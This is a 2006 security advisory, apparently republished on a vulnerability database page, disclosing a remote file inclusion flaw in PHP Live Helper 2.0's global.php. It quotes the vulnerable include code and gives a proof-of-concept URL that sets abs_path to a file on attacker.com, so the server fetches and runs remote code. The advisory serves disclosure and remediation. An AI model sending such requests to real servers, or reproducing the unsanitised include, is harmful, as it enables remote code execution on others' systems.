PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion

2006.08.13
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

____________________ ___ ___ ________ _ _____/_ ___ / | \_____ | __)_ / // ~ / | | \ ___ Y / | /_______ / ______ /___|_ /_______ / / / / / .OR.ID ECHO_ADV_42$2006 ------------------------------------------------------------------------ --------------------------- [ECHO_ADV_42$2006] PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion ------------------------------------------------------------------------ --------------------------- Author : Ahmad Maulana a.k.a Matdhule Date Found : July, 02nd 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv42-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PHP Live Helper Application : PHP Live Helper version : Latest version [2.0] URL : http://www.turnkeywebtools.com/phplivehelper ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~~~~~~ -----------------------global.php---------------------- .... <?PHP /* global.php - 05/30/2006 - 5:27pm PST - 2.0 PHP Live Helper http://www.turnkeywebtools.com/phplivehelper/ Copyright (c) 2001-2006 Turnkey Web Tools, Inc. */ define('PLH_SESSION_START', '1'); //////////////////////////// // Load Class & Secure Files //////////////////////////// require_once $abs_path."/libsecure.php"; include_once $abs_path."/include/class.browser.php"; ... ---------------------------------------------------------- Input passed to the "abs_path" parameter in global.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Proof Of Concept: ~~~~~~~~~~~~~~~~~ http://target.com/[phplivehelper_path]/global.php?abs_path=http://attack er.com/inject.txt? Solution: ~~~~~~~~~ - Sanitize variable $abs_path on global.php. Notification: ~~~~~~~~~~~~ I've been contacting the web/software administrator to tell about this hole in his system, but instead of giving a nice response, he replied so rudely and arrogantly. I recommend not to use this product for your own sake. ------------------------------------------------------------------------ --- Shoutz: ~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker (at) yahoogroups (dot) com [email concealed], jasakom_perjuangan (at) yahoogroups (dot) com [email concealed] ~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top